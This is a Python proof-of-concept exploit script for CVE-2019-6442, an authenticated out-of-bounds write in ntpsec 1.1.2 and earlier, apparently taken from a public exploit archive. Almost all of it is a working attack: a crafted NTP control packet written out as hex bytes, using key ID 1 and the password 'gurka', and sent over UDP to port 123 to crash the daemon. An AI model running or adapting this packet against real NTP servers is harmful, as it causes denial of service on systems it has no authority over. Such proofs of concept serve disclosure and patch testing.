49 lines
No EOL
3 KiB
Python
Executable file
49 lines
No EOL
3 KiB
Python
Executable file
#!/usr/bin/env python
|
||
# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
|
||
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
|
||
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
|
||
# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite
|
||
# Vendor Homepage: https://ntpsec.org/
|
||
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
|
||
# Affected versions: all versions of ntpsec including, and prior to 1.1.2.
|
||
# CVE: CVE-2019-6442
|
||
# Note: this PoC uses Keyid 1 with password ‘gurka’
|
||
|
||
import sys
|
||
import socket
|
||
|
||
buf = ("\x16\x08\x00\x03\x00\x00\x00\x00\x00\x00\x01\xd4\x6c\x65\x61\x6d" +
|
||
"\x3d\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
|
||
"\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x34\x41\x41\x42" +
|
||
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41" +
|
||
"\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41" +
|
||
"\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
|
||
"\x42\x42\x42\x42\x42\x31\x32\x33\x34\x35\x3e\x37\x38\x39\x30\x31" +
|
||
"\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37" +
|
||
"\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d\x36\x33" +
|
||
"\x34\x35\x36\x37\x38\x39\x30\x31\x32\x38\x3d\x20\x2d\x36\x4a\x0a" +
|
||
"\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x0a\x34\x35\x36" +
|
||
"\x37\x38\x39\x0a\x0a\x0a\x26\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
|
||
"\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a" +
|
||
"\x42\x42\x42\x54\x42\x42\x41\x41\x41\x34\x41\x41\x42\x42\x42\x42" +
|
||
"\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41" +
|
||
"\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a" +
|
||
"\x41\x41\x41\x41\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x25\x42" +
|
||
"\x42\x41\x41\x41\x0a\xae\x4a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x08" +
|
||
"\x0a\x2b\x0a\x0a\x0a\x34\x35\x36\x37\x38\x39\x0a\x0a\x0a\x26\x0a" +
|
||
"\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
|
||
"\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a\x42\x42\x42\x54\x42\x42\x41\x41" +
|
||
"\x41\x34\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41" +
|
||
"\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a" +
|
||
"\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x41\x41\x41\x41\x57\x41\x42\x42" +
|
||
"\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x0a\x42\x42\x42" +
|
||
"\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x41\x41\x41\x43" +
|
||
"\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a" +
|
||
"\x0a\x0a\x05\xff\xff\x05\x0a\x64\x1b\x0a\x0a\x0a\x2b\x0a\x0a\x0a" +
|
||
"\x0a\x0a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\x34\x00\x00\x00" +
|
||
"\x80\x39\x30\x20\x32\x33\x34\x35\x36\x37\x38\x39\x30\x41\x5b\x41" +
|
||
"\x00\x00\x00\x01\x8f\x2c\x6e\x5b\x49\xe7\xa0\x78\xa1\x9b\x50\xf5" +
|
||
"\xb2\x18\x04\x00")
|
||
|
||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||
sock.sendto(buf, ('127.0.0.1', 123)) |